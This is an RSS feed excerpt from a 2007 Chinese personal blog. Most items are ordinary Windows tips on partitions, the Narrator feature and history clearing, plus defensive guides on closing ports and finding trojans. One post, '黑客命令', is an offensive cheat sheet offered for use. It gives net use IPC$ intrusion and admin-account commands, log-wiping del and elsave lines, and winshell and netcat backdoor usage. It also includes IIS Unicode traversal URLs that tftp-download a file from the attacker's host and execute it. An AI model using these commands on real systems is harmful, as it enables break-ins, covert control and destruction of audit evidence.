<P style="TEXT-INDENT: 2em">在“未指派”的磁盘空间上点击右键，选择“新建磁盘分区”命令。在弹出的磁盘分区向导窗口中，选择分区类型为“扩展分区”，点击“下一步”后，输入新建分区的容量大小，接着在此设置分区的磁盘文件格式，并勾选“不格式化”项，最后点击“完成”按钮即可完成分区操作。再打开“我的电脑”，右键点击新建分区，选择“格式化”命令，使用快速格式化方式，即可在一分钟之内，完成分区到格式化的全部操作。</P>
<P style="TEXT-INDENT: 2em">2.折分与合并磁盘分区</P>
<P style="TEXT-INDENT: 2em">如果硬盘中的某个分区容量过大，可将其拆分为两个分区。首先将该磁盘分区中的所有文件保存到其它分区中。之后在“磁盘管理”中右键点击该分区，选择“删除逻辑分区”命令。确认后完成分区删除，此时该分区在列表中就会被识别为“未指派”的磁盘空间。</P>
<P style="TEXT-INDENT: 2em">之后，按照如上操作，在“未指派”的磁盘空间上，使用“新建磁盘分区”命令，分别设置新建分区的空间大小，并格式化新建的两个分区即可。</P>
<P style="TEXT-INDENT: 2em">需要合并两个分区时，则可将所有数据保存后，使用“删除逻辑分区”命令，获得两个空白的“未指派”分区。接着选中“未指派”分区，点击右键后选择“新建磁盘分区”命令，即可完成分区的合并。</P>
<P style="TEXT-INDENT: 2em">3.压缩分区增加磁盘空间</P>
<P style="TEXT-INDENT: 2em">如果某个磁盘分区空间紧张，而该分区中的数据并不是经常读取，则可将该分区进行压缩以“增加”可使用空间。由于压缩分区必须在NTFS磁盘格式下进行，所以对于采用FAT32磁盘格式的分区，可先在命令行提示符窗口中，执行“Convert 盘符 /FS:NTFS”命令，将该分区转换为NTFS磁盘格式。之后，右键点击要压缩的分区，选择“属性”命令。在打开窗口中选择“常规”选项卡，勾选“压缩驱动器以节约磁盘空间”项。在关闭窗口后，系统就将进行磁盘压缩操作，完成时便会发现该分区的剩余空间增加了。</P>
<P style="TEXT-INDENT: 2em">4.命令行下为分区扩容 </P>
<P style="TEXT-INDENT: 2em">如果某分区中的剩余空间不足，还可以使用分区扩容的方式，来增加可用空间。在命令提示符窗口中，执行“Diskpart”命令，启动命令行磁盘管理工具。接着执行“list partition”命令，即可显示当前系统分区列表。假设要删除第3个分区，为第2个分区扩容，则可执行命令“Select ParTtition 3”，使第三个分区具有焦点属性，再执行“Delete Partition”即可删除第3个分区。</P>
<P style="TEXT-INDENT: 2em">接着执行“Select partition 2”命令，使第2个分区具有焦点属性，再执行“Extend”命令，便可将之前被删除分区空间，自动添加到第2分区中。如果被扩容的第2分区采用了NTFS磁盘格式，那么扩容后不会丢失任何数据。最后执行“Exit”命令，回到“我的电脑”中就可看到硬盘分区已被扩容了。</P>
<P style="TEXT-INDENT: 2em">5.双倍提升硬盘传输速度</P>
<P style="TEXT-INDENT: 2em">如果有两块硬盘，配合Windows XP中的动态卷功能，即可极大提升硬盘传输速度。首先，将两个硬盘中的所有分区转换为NTFS磁盘格式。接着打开“磁盘管理”窗口，分别使用右键点击两块硬盘，在弹出菜单中选择“转换到动态磁盘”命令，将两块硬盘都转换为动态磁盘。</P>
<P style="TEXT-INDENT: 2em">右键点击第二块硬盘后的黑色区域，选择“新建卷”命令。在打开的对话框中，点击“下一步”，出现3个选项，选择“带区卷”。点击“下一步”，第二块硬盘将出现在“可以选的”列表中，在下面的选择空间量中，输入要支配单个硬盘的空间。单击“下一步”，为建立的分区指派一个盘符。点击“下一步”，选择使用NTFS磁盘格式，来快速格式化该分区，最后单击“完成”。此时在“磁盘管理”窗口的分区列表中显示出的灰色区域，就是新建的带区卷。</P>
<P style="TEXT-INDENT: 2em">打开“我的电脑”，将会看到新建的分区，当在此分区进行数据读取时，即可达到近两倍的数据传输率。使用同样步骤，将剩余空间均新建为带区卷，即可变相享受磁盘阵列所带来的高数据传输率优势。</P>
<P style="TEXT-INDENT: 2em"></P></div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/502871112007112763711682</comments>
    <slash:comments>23</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/502871112007112763711682</guid>
    <pubDate>Thu, 27 Dec 2007 18:37:11 +0800</pubDate>
    <dcterms:modified>2007-12-31T09:40:01+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[让你的键盘会说话!]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/50287111200711248329544</link>
    <description><![CDATA[<div><P>让你的键盘会说话！。。。<BR>　　　　长期面对无声的电脑，我们难免疲倦。<BR>　　　　<BR>　　　　如果正在输入的内容被系统一字(字母)不差地念出来，你还能在无声的疲倦中输入错误的内容吗？<BR><BR>本文以Windows <BR>2000/XP中一个鲜为人知的“讲述人”为例教你DIY一个完全免费的语音<BR>　　　　键盘。 <BR>　　　　<BR>　　　　在“运行”中输入“narrator”，不带引号，点“确定”。<BR>　　　　<BR>　　　　点“确定”跳过后便请出本文的主角──“讲述人”。<BR>　　　　<BR>　　　　如果你的音箱已经打开，听到了什么？不想听的话就按一下Ctrl键。<BR>　　　　<BR>　　　　再按任意键试试，你输入的字母键被系统用标准的美国英语读了出来，这时一个完全免费的语音键盘就诞生在你的手中了，有兴趣的朋友不妨试试<BR></P></div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/50287111200711248329544</comments>
    <slash:comments>21</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/50287111200711248329544</guid>
    <pubDate>Mon, 24 Dec 2007 20:32:09 +0800</pubDate>
    <dcterms:modified>2007-12-24T20:32:09+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[黑客命令]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/502871112007112293917331</link>
    <description><![CDATA[<div>与远程主机建立空管连接 net use \IP地址ipc$ "" /use:"" <BR>　　以管理员身份登录远程主机 net use \IP地址ipc$ "密码" /use:"Administrator" <BR>　　传送文件到远程主机WINNT目录下copy 本机目录路径程序 \IP地址admin$ <BR>　　查看远程主机时间 net time \IP地址 <BR>　　定时启动某个程序 at \IP地址 02:18 readme.exe <BR>　　查看共享 net view \IP地址 <BR>　　查看netbios工作组列表 nBTstat -A IP地址 <BR>　　将远程主机C盘映射为自己的F盘 net use f: \IP地址c$ ""/user:"Administrator" <BR>　　这两条把自己增加到管理员组： net user 用户名 密码 /add <BR>　　net locaLGroup Administrators 用户名 /add <BR>　　断开连接 net use \IP地址ipc$ /delete <BR><BR>　　扫尾： <BR>　　del C:winntsystem32logfiles*.* <BR>　　del C:winntssytem32config*.evt <BR>　　del C:winntsystem32dTCLog*.* <BR>　　del C:winntsystem32*.log <BR>　　del C:winntsystem32*.txt <BR>　　del C:winnt*.txt <BR>　　del C:winnt*.log <BR><BR>一、netsvc.exe <BR>　　下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务： <BR>　　netsvc /list \IP地址 <BR>　　netsvc schedule \IP地址 /query <BR>　　netsvc \IP地址 schedule /start <BR><BR>二、OpenTelnet.exe <BR>　　远程启动主机的Telnet服务，并绑定端口到7878，例如： <BR>　　OpenTelnet \IP地址 用户名 密码 1 7878 <BR>　　然后就可以telnet到主机的7878端口，进入DOS方式下： <BR>　　telnet IP地址 7878 <BR><BR>三、winshell.exe <BR>　　一个非常小的木马（不到6K），telnet到主机的7878端口，输入密码winshell，当看到CMD&gt;后，可打下面的命令： <BR>　　p Path （查看winshell主程序的路径信息） <BR>　　b reBoot （重新启动机器） <BR>　　d shutDown （关闭机器） <BR>　　s Shell （执行后你就会看到可爱的“C:&gt;”） <BR>　　x eXit （退出本次登录会话，此命令并不终止winshell的运行） <BR>　　CMD&gt; http://.../srv.exe （通过http下载其他网站上的文件到运行winshell的机器上） <BR><BR>四、3389登陆器，GUI方式登录远程主机的 <BR><BR>五、elsave.exe <BR>　　事件日志清除工具 <BR>　　elsave -s \IP地址 -l "application" -C <BR>　　elsave -s \IP地址 -l "system" -C <BR>　　elsave -s \IP地址 -l "security" -C <BR>　　执行后成功清除应用程序日志，系统日志，安全日志 <BR>六、hbulot.exe <BR>　　开启win2kserver和winxp的3389服务 <BR>　　hbulot （/r） <BR><BR>七、nc.exe(netcat.exe) <BR>　　一个很好的工具，一些脚本程序都要用到它，也可做溢出后的连接用。 <BR>　　想要连接到某处: nc （-options） hostname port（s）（ports） ... <BR>　　绑定端口等待连接: nc -l -p port （-options） （hostname） （port） <BR><BR>参数: <BR>　　-e prog 程序重定向，一旦连接，就执行 （危险!） <BR>　　-g gateway source-routing hop point（s）, up to 8 <BR>　　-G num source-routing pointer: 4, 8, 12, ...<BR>　　-h 帮助信息 <BR>　　-i secs 延时的间隔 <BR>　　-l 监听模式，用于入站连接 <BR>　　-n 指定数字的IP地址，不能用hostname <BR>　　-o file 记录16进制的传输 <BR>　　-p port 本地端口号 <BR>　　-r 任意指定本地及远程端口 <BR>　　-s addr 本地源地址 <BR>　　-u UDP模式 <BR>　　-v 详细输出——用两个-v可得到更详细的内容 <BR>　　-w secs timeout的时间 <BR>　　-z 将输入输出关掉——用于扫描时 <BR><BR>八、TFTPD32.EXE <BR>　　把自己的电脑临时变为一台FTP服务器，让肉鸡来下载文件，tftp命令要在肉鸡上执行，通常要利用Unicode漏洞或telnet到肉鸡，例如： <BR>　　http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名 <BR>　　然后可以直接令文件运行： <BR>　　http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 <BR><BR>九、prihack.exe是IIS的printer远程缓冲区溢出工具<BR>　　idqover.exe是溢出idq的，选择“溢出后在一个端口监听”，然后用telnet连接它的监听端口，如果溢出成功，一连它的端口，绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出，成功以后winxp下需要打winxp。 <BR><BR>一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor，exe要放到cgi-bin目录下，asp放到有ASP执行权限的目录。然后用IE浏览器连接.<BR></div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/502871112007112293917331</comments>
    <slash:comments>16</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/502871112007112293917331</guid>
    <pubDate>Sat, 22 Dec 2007 09:39:17 +0800</pubDate>
    <dcterms:modified>2007-12-27T18:38:02+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[怎样清除电脑记录？]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/502871112007111394219784</link>
    <description><![CDATA[<div><P><FONT color=#ff0000>电脑是公司公用电脑，有很多人使用，我想清除电脑的使用纪录信息，应该怎样做？</FONT></P>
<P>&nbsp;</P>
<P>我给你说个彻底的办法。完全是按照我自己的经验一步步打开然后找到后给你说的，这样处理后不要说没有打开的纪录，连这个文件夹都删除了，还有象你的地址栏和运行里面每次输入的也不会留下纪录，百度等搜索栏里面也不会有纪录，我这个是最彻底的方法，&nbsp;&nbsp;&nbsp;&nbsp;</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp; 开始--运行--gpedit.msc---打开组策略--用户配置--管理模板--任务栏和开始菜单--1.从开始菜单删除用户文件夹(选择启用)2.从开始菜单中删除“我的文档”图标(选择启用)3.从开始菜单上删除“文档”菜单(选择启用)4.不要保留最近打开文档的纪录(选择启用)5. 退出时清除最近打开的文档的纪录(选择启用)---确定，重启机子--完成。 <BR>若是想固定主页，也可以在这里找下，首先把ie主页设为你想固定的主页，比如空白页，找到开始--运行--gpedit.msc---打开组策略--用户配置--管理模板--windows组件--internet explorer--禁用更改主页设置--启用---确定--完成。 <BR>这样子你以后不用那么麻烦总是要清理了，因为很多垃圾文件都不能生成了</CA></P></div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/502871112007111394219784</comments>
    <slash:comments>16</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/502871112007111394219784</guid>
    <pubDate>Thu, 13 Dec 2007 21:42:19 +0800</pubDate>
    <dcterms:modified>2007-12-25T09:15:06+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[查看并关闭电脑端口，让你的电脑不被攻击]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/502871112007111061151526</link>
    <description><![CDATA[<div><P>&nbsp;</P>
<P>文章并非原创</P>
<P>实在找不到文章的来源了，所以就不把原创作者给发上来了，希望作者谅解。<BR></P>
<P>关闭无用端口和修改3389端口 <BR>Windows的每一项服务都对应相应的端口，比如众如周知的WWW服务的端口是80，smtp是25，ftp是21，win2000安装中这些服务都是默认开启的。对于个人用户来说确实没有必要，关掉端口也就是关闭了无用的服务。 <BR>关闭这些无用的服务可以通过“控制面板”的“管理工具”中的“服务”中来配置。 <BR>1、关闭7.9等等端口：关闭Simple TCP/IP Service,支持以下 TCP/IP 服务：Character Generator, Daytime, Discard, Echo, 以及 Quote of the Day。 <BR>2、关闭80口：关掉WWW服务。在“服务”中显示名称为"World Wide Web Publishing Service"，通过 Internet 信息服务的管理单元提供 Web 连接和管理。 <BR>3、关掉25端口：关闭Simple Mail Transport Protocol (SMTP)服务，它提供的功能是跨网传送电子邮件。 <BR>4、关掉21端口：关闭FTP Publishing Service,它提供的服务是通过 Internet 信息服务的管理单元提供 FTP 连接和管理。 <BR>5、关掉23端口：关闭Telnet服务，它允许远程用户登录到系统并且使用命令行运行控制台程序。 <BR>6、还有一个很重要的就是关闭server服务，此服务提供 RPC 支持、文件、打印以及命名管道共享。关掉它就关掉了win2k的默认共享，比如ipc$、c$、admin$等等，此服务关闭不影响您的共他操作。 <BR>7、还有一个就是139端口，139端口是NetBIOS Session端口，用来文件和打印共享，注意的是运行samba的unix机器也开放了139端口，功能一样。以前流光2000用来判断对方主机类型不太准确，估计就是139端口开放既认为是NT机，现在好了。 <BR>关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性，进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”，打勾就关闭了139端口。 <BR>对于个人用户来说，可以在以上各项服务属性设置中设为“禁用”，以免下次重启服务也重新启动后端口再次打开。现在你不用担心你的端口和默认共享了。 <BR>8、修改3389 <BR>打开注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp, 看到那个PortNumber没有?0xd3d，这个是16进制，就是3389啦。我改XXXX这个值是RDP(远程桌面协议)的默认值，也就是说用来配置以后新建的RDP服务的，要改已经建立的RDP服务，我们去下一个键值：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations这里应该有一个或多个类似RDP-TCP的子健（取决于你建立了多少个RDP服务），一样改掉PortNumber。 <BR>好了现在你不用担心你的默认共享了，安全了吧！别高兴太早，下面还有呢。 <BR>六、本地安全策略 <BR>A、通过建立IP策略来阻止端口连接 <BR>TCP端口:21(FTP,换FTP端口)23(TELNET),53(DNS),135,136,137,138,139,443,445,1028,1433,3389 <BR>TCP端口:1080,3128,6588,8080(以上为代理端口).25(SMTP),161(SNMP),67(引导) <BR>UDP端口:1434(这个就不用说了吧) <BR>阻止所有ICMP,即阻止PING命令 <BR>B、在 这里我用关闭135端口来实例讲解 <BR>1.创建IP筛选器和筛选器操作 <BR>a."开始"-&gt;"程序"-&gt;"管理工具"-&gt;"本地安全策略".微软建议使用本地安全策略进行IPsec的设置,因为本地安全策略只应用到本地计算机上,而通常ipsec都是针对某台计算机量身定作的. <BR>b.右击"Ip安全策略,在本地机器",选择"管理 IP 筛选器表和筛选器操作",启动管理 IP 筛选器表和筛选器操作对话框.我们要先创建一个IP筛选器和相关操作才能够建立一个相应的IPsec安全策略. <BR>c.在"管理 IP 筛选器表"中,按"添加"按钮建立新的IP筛选器: <BR>1)在跳出的IP筛选器列表对话框内,填上合适的名称,我们这儿使用"tcp135",描述随便填写.单击右侧的"添加..."按钮,启动IP筛选器向导. <BR>2)跳过欢迎对话框,下一步. <BR>3)在IP通信源页面,源地方选"任何IP地址",因为我们要阻止传入的访问.下一步. <BR>4)在IP通信目标页面,目标地址选"我的IP地址".下一步. <BR>5)在IP协议类型页面,选择"TCP".下一步. <BR>6)在IP协议端口页面,选择"到此端口"并设置为"135",其它不变.下一步. <BR>7)完成.关闭IP筛选器列表对话框.会发现tcp135IP筛选器出现在IP筛选器列表中. <BR>d.选择"管理筛选器操作"标签,创建一个拒绝操作: <BR>1)单击"添加"按钮,启动"筛选器操作向导",跳过欢迎页面,下一步. <BR>2)在筛选器操作名称页面,填写名称,这儿填写"拒绝".下一步. <BR>3)在筛选器操作常规选项页面,将行为设置为"阻止".下一步. <BR>4)完成. <BR>e、关闭"管理 IP 筛选器表和筛选器操作"对话框. <BR>2.创建IP安全策略 <BR>1.右击"Ip安全策略,在本地机器",选择"创建IP安全策略",启动IP安全策略向导.跳过欢迎页面,下一步. <BR>2.在IP安全策略名称页面,填写合适的IP安全策略名称,这儿我们可以填写"拒绝对tcp135端口的访问",描述可以随便填写.下一步. <BR>3.在安全通信要求页面,不选择"激活默认响应规则".下一步. <BR>4.在完成页面,选择"编辑属性".完成. <BR>5.在"拒绝对tcp135端口的访问属性"对话框中进行设置.首先设置规则: <BR>1)单击下面的"添加..."按钮,启动安全规则向导.跳过欢迎页面,下一步. <BR>2)在隧道终结点页面,选择默认的"此规则不指定隧道".下一步. <BR>3)在网络类型页面,选择默认的"所有网络连接".下一步. <BR>4)在身份验证方法页面,选择默认的"windows 2000默认值(Kerberos V5 协议)".下一步. <BR>5)在IP筛选器列表页面选择我们刚才建立的"tcp135"筛选器.下一步. <BR>6)在筛选器操作页面,选择我们刚才建立的"拒绝"操作.下一步. <BR>7)在完成页面,不选择"编辑属性",确定. <BR>6.关闭"拒绝对tcp135端口的访问属性"对话框. <BR>3.指派和应用IPsec安全策略 <BR>1）缺省情况下,任何IPsec安全策略都未被指派.首先我们要对新建立的安全策略进行指派.在本地安全策略MMC中,右击我们刚刚建立的""拒绝对tcp135端口的访问属性"安全策略,选择"指派". <BR>2）立即刷新组策略.使用"secedit /refreshpolicy machine_policy"命令可立即刷新组策略. <BR>七、审核策略 <BR>具体方法：控制面板==》管理工具==》本地安全策略==》本地策略==》审核策略，然后右键点击下列各项，选择“安全性”来设置就可以了。 <BR>审核策略更改:成功,失败 <BR>审核登录事件:成功,失败 <BR>审核对象访问:失败 <BR>审核对象追踪:成功,失败 <BR>审核目录服务访问:失败 <BR>审核特权使用:失败 <BR>审核系统事件:成功,失败 <BR>审核账户登录事件:成功,失败 <BR>审核账户管理:成功,失败 <BR>密码策略:启用“密码必须符合复杂性要求","密码长度最小值"为6个字符,"强制密码历史"为5次,"密码最长存留期"为30天. <BR>在账户锁定策略中设置:"复位账户锁定计数器"为30分钟之后,"账户锁定时间"为30分钟,"账户锁定值"为30分钟. <BR>安全选项设置:本地安全策略==本地策略==安全选项==对匿名连接的额外限制,双击对其中有效策略进行设置,选择"不允许枚举SAM账号和共享",因为这个值是只允许非NULL用户存取SAM账号信息和共享信息,一般选择此项，然后再禁止登录屏幕上显示上次登录的用户名。 <BR>禁止登录屏幕上显示上次登录的用户名也可以改注册表HKEY_LOCAL_MACHINE\SOFTTWARE\Microsoft\WindowsNT\CurrentVesion\Winlogn项中的Don't Display Last User Name串，将其数据修改为1 <BR>八、Windows日志文件的保护 <BR>日志文件对我们如此重要，因此不能忽视对它的保护，防止发生某些“不法之徒”将日志文件清洗一空的情况。 <BR>1． 修改日志文件存放目录 <BR>Windows日志文件默认路径是“%systemroot%\system32\config”，我们可以通过修改注册表来改变它的存储目录，来增强对日志的保护。 <BR>点击“开始→运行”，在对话框中输入“Regedit”，回车后弹出注册表编辑器，依次展开“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog”后，下面的Application、Security、System几个子项分别对应应用程序日志、安全日志、系统日志。 <BR>我以应用程序日志为例，将其转移到“d:abc”目录下。首先选中Application子项，在右栏中找到File键，其键值为应用程序日志文件的路径“%SystemRoot%system32configAppEvent.Evt”，将它修改为“d:abc\AppEvent.Evt”。接着在D盘新建“abc”目录，将“AppEvent.Evt”拷贝到该目录下，重新启动系统，这样就完成了应用程序日志文件存放目录的修改。其它类型日志文件路径修改方法相同，只是在不同的子项下操作。 <BR>2． 设置文件访问权限 <BR>修改了日志文件的存放目录后，日志还是可以被清空的，下面通过修改日志文件访问权限，防止这种事情发生，前提是Windows系统要采用NTFS文件系统格式。 <BR>右键点击D盘的CCE目录，选择“属性”，切换到“安全”标签页后，首先取消“允许将来自父系的可继承权限传播给该对象”选项勾选。接着在账号列表框中选中“Everyone”账号，只给它赋予“读取”权限；然后点击“添加”按钮，将“System”账号添加到账号列表框中，赋予除“完全控制”和“修改”以外的所有权限，最后点击“确定”按钮。这样当用户清除Windows日志时，就会弹出错误对话框。 <BR>呵呵，现在你也不用担心了！！下面我们继续。 <BR>九、 上网 <BR>现在你可以连接上网了，但是暂时不要打开IE浏览器。接下来工作是升级杀毒软件和防火墙，并设置好，具体设置方法请参照黑基教程。然后从开始菜单打开Windows update 打好系统所有的补丁，这个过程有点漫长，耐心等待吧。当你打好系统所有补丁后再备份好系统，呵呵……上网吧你安全了（注意！没有绝对的安全哦）！！！ <BR>好了暂时就到这里了，我在这里总结出来的只是安全问题中最基础的一部分，其它的还要*大家自己去努力学习。大家碰到不懂的知识请多用搜索引擎，那个才是你最忠实伙伴、最诚实朋友，也是你最好老师！ <BR>另外，若有不到之处还请各位前辈批评指正！！ <BR>总之，多看看、多动脑、多动手就没有你学不会的东西！！！</P></div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/502871112007111061151526</comments>
    <slash:comments>5</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/502871112007111061151526</guid>
    <pubDate>Mon, 10 Dec 2007 18:11:51 +0800</pubDate>
    <dcterms:modified>2008-07-15T22:26:52+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[ 如何防止黑客的攻击]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/502871112007111054833397</link>
    <description><![CDATA[<div><P>文章并非原创</P>
<P>实在找不到文章的来源了，所以就不把原创作者给发上来了，希望作者谅解。<BR></P>
<P style="TEXT-INDENT: 2em">&nbsp;</P>
<P style="TEXT-INDENT: 2em">现在攻击个人电脑的木马软件很多，功能比以前多了，使用也比以前方便多了，所以危害也比以前大了，很多人中了木马自己还不知道，要想使自己的电脑安全，就好扎好自己的篱笆，看好自己的门，电脑也有自己的门，我们叫它端口.</P>
<P style="TEXT-INDENT: 2em">端口</P>
<P style="TEXT-INDENT: 2em">你在网络上冲浪，别人和你聊天，你发电子邮件，必须要有共同的协议，这个协议就是TCP/IP协议，任何网络软件的通讯都基于TCP/IP协议。如果把互联网比作公路网，电脑就是路边的房屋，房屋要有门你才可以进出，TCP/IP协议规定，电脑可以有256乘以256扇门，即从0到65535号“门”，TCP/IP协议把它叫作“端口”。当你发电子邮件的时候，E-mail软件把信件送到了邮件服务器的25号端口，当你收信的时候，E-mail软件是从邮件服务器的110号端口这扇门进去取信的，你现在看到的我写的东西，是进入服务器的80端口。新安装好的个人电脑打开的端口号是139端口，你上网的时候，就是通过这个端口与外界联系的。黑客不是神仙，他也是通过端口进入你的电脑.</P>
<P style="TEXT-INDENT: 2em">通过端口进入你的电脑</P>
<P style="TEXT-INDENT: 2em">黑客是怎么样进入你的电脑的呢？当然也是基于TCP/IP协议通过某个端口进入你的个人电脑的。如果你的电脑设置了共享目录，那么黑客就可以通过139端口进入你的电脑，注意！WINDOWS有个缺陷，就算你的共享目录设置了多少长的密码，几秒钟时间就可以进入你的电脑，所以，你最好不要设置共享目录，不允许别人浏览你的电脑上的资料。除了139端口以外，如果没有别的端口是开放的，黑客就不能入侵你的个人电脑。那么黑客是怎么样才会进到你的电脑中来的呢？答案是通过特洛伊木马进入你的电脑。如果你不小心运行了特洛伊木马，你的电脑的某个端口就会开放，黑客就通过这个端口进入你的电脑。举个例子，有一种典型的木马软件，叫做netspy.exe。如果你不小心运行了netspy.exe，那么它就会告诉WINDOWS，以后每次开电脑的时候都要运行它，然后，netspy.exe又在你的电脑上开了一扇“门”，“门”的编号是7306端口，如果黑客知道你的7306端口是开放的话，就可以用软件偷偷进入到你的电脑中来了。特洛伊木马本身就是为了入侵个人电脑而做的，藏在电脑中和工作的时候是很隐蔽的，它的运行和黑客的入侵，不会在电脑的屏幕上显示出任何痕迹。WINDOWS本身没有监视网络的软件，所以不借助软件，是不知道特洛伊木马的存在和黑客的入侵。接下来，就来说利用软件如何发现自己电脑中的木马.</P>
<P style="TEXT-INDENT: 2em">如何发现自己电脑中的木马</P>
<P style="TEXT-INDENT: 2em">再以netspy.exe为例，现在知道netspy.exe打开了电脑的7306端口，要想知道自己的电脑是不是中netspy.exe，只要敲敲7306这扇“门”就可以了。你先打开C:\WINDOWS\WINIPCFG.EXE程序，找到自己的IP地址（比如你的IP地址是10.10.10.10），然后打开浏览器，在浏览器的地址栏中输入 <A href="http://10.10.10.10:7306/">http://10.10.10.10:7306/</A>，如果浏...??查找木马.</P>
<P style="TEXT-INDENT: 2em">进一步查找木马</P>
<P style="TEXT-INDENT: 2em">让我们做一个试验：netspy.exe开放的是7306端口，用工具把它的端口修改了，经过修改的木马开放的是7777端口了，现在再用老办法是找不到netspy.exe木马了。我们可以用扫描自己的电脑的办法看看电脑有多少端口开放着，并且再分析这些开放的端口。 </P>
<P style="TEXT-INDENT: 2em">前面讲了电脑的端口是从0到65535为止，其中139端口是正常的，首先找个端口扫描器，推荐“代理猎手”，你上网以后，找到自己的IP地址，现在请关闭正在运行的网络软件，因为可能开放的端口会被误认为是木马的端口，然后让代理猎手对0到65535端口扫描，如果除了139端口以外还有其他的端口开放，那么很可能是木马造成的。 </P>
<P style="TEXT-INDENT: 2em">排除了139端口以外的端口，你可以进一步分析了，用浏览器进入这个端口看看，它会做出什么样的反映，你可以根据情况再判断了。 </P>
<P style="TEXT-INDENT: 2em">扫描这么多端口是不是很累，需要半个多小时，Tcpview.exe可以看电脑有什么端口是开放的，除了139端口以外，还有别的端口开放，你就可以分析了，如果判定自己的电脑中了木马，那么，你就得在硬盘上删除木马.</P>
<P style="TEXT-INDENT: 2em">在硬盘上删除木马</P>
<P style="TEXT-INDENT: 2em">最简单的办法当然是用杀毒软件删除木马了，Netvrv病毒防护墙可以帮你删除netspy.exe和bo.exe木马，但是不能删除netbus木马。 </P>
<P style="TEXT-INDENT: 2em">下面就netbus木马为例讲讲删除的经过。 </P>
<P style="TEXT-INDENT: 2em">简单介绍一下netbus木马，netbus木马的客户端有两种，开放的都是12345端口，一种以Mring.exe为代表（472,576字节），一种以SysEdit.exe为代表（494,592字节）。 </P>
<P style="TEXT-INDENT: 2em">Mring.exe一旦被运行以后，Mring.exe就告诉WINDOWS，每次启动就将它运行，WINDOWS将它放在了注册表中，你可以打开C:\WINDOWS\REGEDIT.EXE进入HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run找到Mring.exe然后删除这个健值，你再到WINDOWS中找到Mring.exe删除。注意了，Mring.exe可能会被黑客改变名字，字节长度也被改变了，但是在注册表 中的位置不会改变，你可以到注册表的这个位置去找。 </P>
<P style="TEXT-INDENT: 2em">另外，你可以找包含有“netbus”字符的可执行文件，再看字节的长度，我查过了，WINDOWS和其他的一些应用软件没有包含“netbus”字符的，被你找到的文件多半就是Mring.exe的变种。 </P>
<P style="TEXT-INDENT: 2em">SysEdit.exe被运行以后，并不加到WINDOWS的注册表中，也不会自动挂到其他程序中，于是有人认为这是无害的木马，其实这是最可恶、最阴险的木马。别的木马被加到了注册表中，你就有痕迹可查了，就连专家们认为最凶恶的BO木马也可以轻而易举地被我们从注册表中删除。 </P>
<P style="TEXT-INDENT: 2em">而SysEdit.exe要是挂在其他的软件中，只要你不碰这个软件，SysEdit.exe也就不发作，一旦运行了被安装SysEdit.exe的程序，SysEdit.exe也同时启动了。我们再来作做这样一个实验，将SysEdit.exe和C:\WINDOWS\SYSTEM\Abcwin.exe捆绑起来，Abcwin.exe是智能ABC输入法，当我开启电脑到上网，只要没有打开智能ABC输入法打字聊天，SysEdit.exe也就没有被运行，你就不能进入我的12345端口，如果我什么时候想打字了，一旦启动智能ABC输入法（Abcwin.exe），那么捆绑在Abcwin.exe上的SysEdit.exe也同时被运行了，我的12345端口被打开，别人就可以黑到我的电脑中来了。同样道理，SysEdit.exe可以被捆绑到网络传呼机、信箱工具等网络工具上，甚至可以捆绑到拨号工具上，电脑中的几百的程序中，你知道会在什么地方发现它吗？所以我说这是最最阴险的木马，让人防不胜防。 </P>
<P style="TEXT-INDENT: 2em">有的时候知道自己中了netbus木马，特别是SysEdit.exe，能发现12345端口被开放，并且可以用netbus客户端软件进入自己的电脑，却不知道木马在什么地方。这时候，你可以检视内存，请打开C:\WINDOWS\DRWATSON.EXE，然后对内存拍照，查看“高级视图”中的“任务”标签，“程序”栏中列出的就是正在运行的程序，要是发现可疑的程序，再看“路径”栏，找到这个程序，分析它，你就知道是不是木马了。SysEdit.exe虽然可以隐藏在其他的程序后面，但是在C:\WINDOWS\DRWATSON.EXE中还是暴露了。 </P>
<P style="TEXT-INDENT: 2em">好了，来回顾一下，要知道自己的电脑中有没有木马，只要看看有没有可疑端口被开放，用代理猎手、Tcpview.exe都可以知道。要查找木马，一是可以到注册表的指定位置去找，二是可以查找包含相应的可执行程序，比如，被开放的端口是7306，就找包含“netspy”的可执行程序，三是检视内存，看有没有可以的程序在内存中。 </P>
